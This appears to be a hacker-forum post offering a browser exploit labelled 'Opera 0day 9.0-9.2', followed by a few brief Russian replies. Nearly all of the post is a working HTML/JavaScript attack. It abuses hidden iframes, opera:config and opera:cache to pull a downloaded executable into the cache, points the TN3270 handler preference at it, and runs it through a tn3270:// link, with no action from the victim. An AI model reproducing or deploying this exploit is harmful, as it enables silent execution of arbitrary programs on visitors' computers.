Opera 0day 9.0-9.2
 

<HTM>
<head>
<script>
blank_iframe = document.createElement('iframe');
blank_iframe.src = 'about:blank';
blank_iframe.setAttribute('id', 'blank_iframe_window');
blank_iframe.setAttribute('style', 'display:none');
document.appendChild(blank_iframe);
blank_iframe_window.eval
("config_iframe = document.createElement('iframe');\
config_iframe.setAttribute('id', 'config_iframe_window');\
config_iframe.src = 'opera:config';\
document.appendChild(config_iframe);\
app_iframe = document.createElement('script');\
cache_iframe = document.createElement('iframe');\

app_iframe.src = "http://localhost/youexe.exe";\
app_iframe.onload = function ()\
{\
cache_iframe.src = 'opera:cache';\
cache_iframe.onload = function ()\
{\
cache = cache_iframe.contentDocument.childNodes[0].innerHTML.toUpperCase();\
var re = new RegExp('(OPR\\\\w{5}.EXE)</TD>\\\\s*<TD>\\\\d+</TD>\\\\s*<TD><A HREF=\"'+app_iframe.src.toUpperCase(), '');\
filename = cache.match(re);\
config_iframe_window.eval\
(\"\
opera.setPreference('Network','TN3270 App',opera.getPreference('User Prefs','Cache Directory4')+parent.filename[1]);\
app_link = document.createElement('a');\
app_link.setAttribute('href', 'tn3270://nothing');\
app_link.click();\
setTimeout(function () {opera.setPreference('Network','TN3270 App','telnet.exe')},1000);\
\");\
};\
document.appendChild(cache_iframe);\
};\
document.appendChild(app_iframe);");
</script>
</BODY>
</HTM>

на что скрипт?

на ачате уже было

здесь было:
https://forum.antichat.ru/threadnav47006-1-10.html